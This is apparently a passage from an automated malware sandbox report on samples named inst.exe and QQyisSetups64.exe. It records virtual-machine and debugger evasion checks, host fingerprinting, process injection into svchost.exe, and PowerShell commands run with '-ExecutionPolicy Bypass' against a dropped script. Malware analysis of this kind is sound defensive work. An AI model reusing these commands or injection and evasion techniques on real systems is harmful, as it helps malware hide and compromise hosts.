                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,15_2_00AC8A46
                          Source: C:\Users\user\Downloads\inst.exeCode function: _memset,GetUserNameW,__wcsicoll,_memset,GetModuleFileNameW,StrStrIW,16_2_00AC8A46
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C653FE415_2_6C653FE4
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID=&apos;Disk #0, Partition #1&apos;} where ResultClass = Win32_DiskDrive
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDriveToDiskPartition where Dependent=&quot;Win32_DiskPartition.DeviceID=\&quot;Disk #0, Partition #1\&quot;&quot;
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : ASSOCIATORS OF {Win32_LogicalDisk.DeviceID=&apos;C:&apos;} where ResultClass = Win32_DiskPartition
                          Source: C:\Users\user\Downloads\inst.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_LogicalDiskToPartition where Dependent=&quot;Win32_LogicalDisk.DeviceID=\&quot;C:\&quot;&quot;
                          Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,15_2_00AD88EB
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,15_2_00A84BD0
                          Source: C:\Users\user\Downloads\inst.exeCode function: _malloc,GetAdaptersInfo,_malloc,GetAdaptersInfo,15_2_00AB67A4
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,16_2_00AB67A4
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetAdaptersInfo,GetAdaptersInfo,16_2_00AD88EB
                          Source: C:\Users\user\Downloads\inst.exeCode function: GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,__wcsicoll,StrStrIA,StrStrIA,StrStrIA,GetProcessHeap,GetProcessHeap,HeapFree,16_2_00A84BD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeWindow / User API: threadDelayed 847Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeWindow / User API: threadDelayed 3295Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeWindow / User API: threadDelayed 4873Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3699Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1225Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 359Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 5176Jump to behavior
                          Source: C:\Users\user\Downloads\inst.exeWindow / User API: threadDelayed 4759Jump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-11792
                          Source: C:\Users\user\Downloads\inst.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dllJump to dropped file
                          Source: C:\Users\user\Downloads\inst.exeEvaded block: after key decisiongraph_15-137848
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_6-48845
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-48844
                          Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_15-137322
                          Source: C:\Users\user\Downloads\inst.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\Downloads\inst.exeAPI coverage: 9.0 %
                          Source: C:\Users\user\Downloads\inst.exeAPI coverage: 0.6 %
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 8032Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 7332Thread sleep time: -847000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 6932Thread sleep time: -32950s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe TID: 7332Thread sleep time: -4873000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196Thread sleep count: 3699 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7068Thread sleep count: 1225 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep count: 359 > 30Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\Downloads\inst.exe TID: 2760Thread sleep time: -7764000s >= -30000sJump to behavior
                          Source: C:\Users\user\Downloads\inst.exe TID: 2760Thread sleep time: -7138500s >= -30000sJump to behavior
                          Source: C:\Windows\System32\svchost.exe TID: 516Thread sleep time: -30000s >= -30000s
                          Source: C:\Users\user\Downloads\inst.exeFile opened: PhysicalDrive0Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeThread sleep count: Count: 3295 delay: -10Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Windows\SysWOW64 FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes FullSizeInformationJump to behavior
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACD292 _memset,FindFirstFileW,FindNextFileW,FindClose,15_2_00ACD292
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,15_2_00ACD71E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,15_2_00ADD670
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,15_2_00AD3FB0
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C5EE2B7 FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,15_2_6C5EE2B7
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00ADD670 _memset,FindFirstFileW,FindNextFileW,FindClose,16_2_00ADD670
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00ACD71E FindFirstFileW,GetFullPathNameW,SetLastError,lstrlenW,_wcsrchr,_wcsrchr,16_2_00ACD71E
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AD3FB0 PathFileExistsW,_wcslen,_memset,_memset,PathAppendW,PathAppendW,PathAppendW,FindFirstFileW,FindNextFileW,_memset,PathAppendW,PathAppendW,_memset,PathAppendW,PathAppendW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_00AD3FB0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037880F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_037880F0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03785430 _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,6_2_03785430
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: !Datacenter without Hyper-V (core)
                          Source: inst[1].exe.3.drBinary or memory string: vVIRTUAL SCSIVIRTUAL HDVIRTUAL DISKISCSIRED HAT VIRTIORAMDISKRAM-DISKRAM DISKRAID ARRAYRAID10RAID5RAID1XENSRC XEN VMWAREVBOX HARDDISKQEMU HARDDISKPROMISE 1+0MSFT VIRTUALMICROSOFTMARVELL RAIDLSILOGICLSI MR92LSI MEGALENOVO_RAIDINTEL RAIDIBM SERVERAIDDELL PERCAMD-RAID ARRAYADAPTECRAID0SOFTWARE\360Safe\softmgr\dioraidRAIDIM2S313BR240G BR128G BR120G BR60G 256GB 256GB 256G 256G 240GB 128GB 128GB 128G 128G 120GB 120G
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: without Hyper-V for WESS
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Datacenter without Hyper-V
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: !Enterprise without Hyper-V (core)
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Datacenter without Hyper-V (core)
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Standard without Hyper-V
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000003.1517659324.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000888000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 0000000F.00000002.2559394305.0000000000829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000012.00000002.2576741188.000002945F259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Enterprise without Hyper-V (core)
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pc91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C~
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Enterprise without Hyper-V
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Standard without Hyper-V (core)
                          Source: QQyisSetups64.exe, 00000003.00000002.1457521079.0000000000C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: HPC Edition without Hyper-V
                          Source: svchost.exe, 00000012.00000002.2572704397.0000029459A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: QQyisSetups64.exe, 00000006.00000002.2560049997.0000000000A68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: QQyisSetups64.exe, QQyisSetups64.exe.3.drBinary or memory string: Hyper-V Server
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeAPI call chain: ExitProcess graph end nodegraph_6-48401
                          Source: C:\Users\user\Downloads\inst.exeAPI call chain: ExitProcess graph end nodegraph_15-136382
                          Source: C:\Users\user\Downloads\inst.exeAPI call chain: ExitProcess graph end nodegraph_15-137603
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1001124D
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00A79CD0 GetCurrentThreadId,GetProcessHeap,OpenThread,OpenThread,GetLastError,GetProcessHeap,HeapFree,OutputDebugStringW,CloseHandle,15_2_00A79CD0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0379054D VirtualProtect ?,-00000001,00000104,?6_2_0379054D
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,3_2_10001170
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02860AE4 mov eax, dword ptr fs:[00000030h]3_2_02860AE4
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02880AE4 mov eax, dword ptr fs:[00000030h]6_2_02880AE4
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_036000CD mov eax, dword ptr fs:[00000030h]6_2_036000CD
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03786790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,6_2_03786790
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_1001154A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_1001154A
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_1001124D IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_1001124D
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02871224 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_02871224
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02871521 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02871521
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeCode function: 3_2_02871520 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_02871520
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,6_2_0378DF10
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_0378F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0378F00A
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_03791F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_03791F67
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C86815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_02C86815
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_02C88587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02C88587
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00AF4647
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF116F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00AF116F
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AF18F6 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00AF18F6
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_00AFA44A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00AFA44A
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C68E1EA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_6C68E1EA
                          Source: C:\Users\user\Downloads\inst.exeCode function: 15_2_6C694ACA __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_6C694ACA
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF4647 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00AF4647
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF116F _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00AF116F
                          Source: C:\Users\user\Downloads\inst.exeCode function: 16_2_00AF18F6 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00AF18F6

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037877E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,6_2_037877E0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: 6_2_037877E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,6_2_037877E0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe6_2_037877E0
                          Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe6_2_037877E0
                          Source: C:\Users\user\Desktop\QQyisSetups64.exeProcess created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe" Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
                          Source: inst.exe, 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmp, sites.dll.15.drBinary or memory string: gShell_traywnd*.*
                          Source: QQyisSetups64.exe, 00000006.00000002.2579881406.0000000004845000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .168.2.7 0 min210979Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free2 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                          Source: inst.exeBinary or memory string: Shell_traywnd
